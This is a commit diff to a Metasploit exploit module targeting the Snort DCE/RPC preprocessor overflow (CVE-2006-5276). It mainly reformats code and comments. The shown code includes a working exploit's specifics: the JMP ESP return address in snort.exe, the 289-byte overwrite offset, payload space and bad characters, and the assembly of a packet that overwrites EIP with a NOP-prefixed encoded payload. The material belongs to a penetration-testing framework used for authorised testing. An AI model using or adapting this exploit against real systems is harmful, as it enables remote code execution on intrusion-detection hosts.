Minor formatting changes, tabs etc. and comments for clarity

2012-04-08 15:45:23 -04:00 · 2012-04-08 15:45:23 -04:00 · 89c1894e07
parent b2e0acd92a
commit 89c1894e07
1 changed files with 22 additions and 19 deletions
--- a/modules/exploits/windows/ids/snort_dce_rpc.rb
+++ b/modules/exploits/windows/ids/snort_dce_rpc.rb
@ -38,33 +38,37 @@ class Metasploit3 < Msf::Exploit::Remote
 				[
 					'Carsten Maartmann-Moe <carsten@carmaa.com>'
 				],
-			'License' => MSF_LICENSE,
-			'Version' => '$Revision$',
-			'Platform' => 'win',
-			'References' =>
+			'License'		=> MSF_LICENSE,
+			'Version'		=> '$Revision$',
+			'Platform'		=> 'win',
+			'References'	=>
 				[
 					[ 'OSVDB', '67988' ],
 					[ 'CVE', 'CVE-2006-5276' ],
 					[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']
 				],
-			'Privileged' => true,
-			'Payload' =>
+			'DefaultOptions'	=>
 				{
-					'Space' => 500,
-					'BadChars' => "\x00",
-					'DisableNops' => true,
+					'EXITFUNC'		=> 'thread',
 				},
-			'Targets'	 =>
+			'Payload'	=>
+				{
+					'Space'			=> 390,
+					'BadChars'		=> "\x00",
+					'DisableNops'	=> true,
+				},
+			'Targets'	=>
 				[
 					[ 'Windows Universal',
 						{
-							'Ret' => 0x00407c01,  # JMP ESP snort.exe
-							'Offset' => 0x0121    # The number of bytes before overwrite
+							'Ret'		=> 0x00407c01,	# JMP ESP snort.exe
+							'Offset'	=> 289		# The number of bytes before overwrite
 						}
 					],
 				],
-			'DisclosureDate' => 'Feb 19 2007',
-			'DefaultTarget' => 0))
+			'Privileged'		=> true,
+			'DisclosureDate'	=> 'Feb 19 2007',
+			'DefaultTarget'		=> 0))

 		register_options(
 			[
@ -87,7 +91,6 @@ class Metasploit3 < Msf::Exploit::Remote

 		capture_sendto(p, rhost)

-		# Cleanup
 		handler
 	end

@ -145,14 +148,14 @@ class Metasploit3 < Msf::Exploit::Remote
 		sploit = make_nops(10)
 		sploit << payload.encoded

-		# Padding (need to bad the payload with one byte to pass size check)
+		# Padding (to pass size check)
 		sploit << make_nops(1)

-		# The size to be included the Write AndX Request #2, including sploit payload
-		size = [(sploit.size() + target['Offset'])].pack('v')
+		# The size to be included in Write AndX Request #2, including sploit payload
+		requestsize = [(sploit.size() + target['Offset'])].pack('v')

 		# Assemble the parts into one package
-		p.payload = header << size << tail << eip << sploit
+		p.payload = header << requestsize << tail << eip << sploit
 		p.recalc

 		p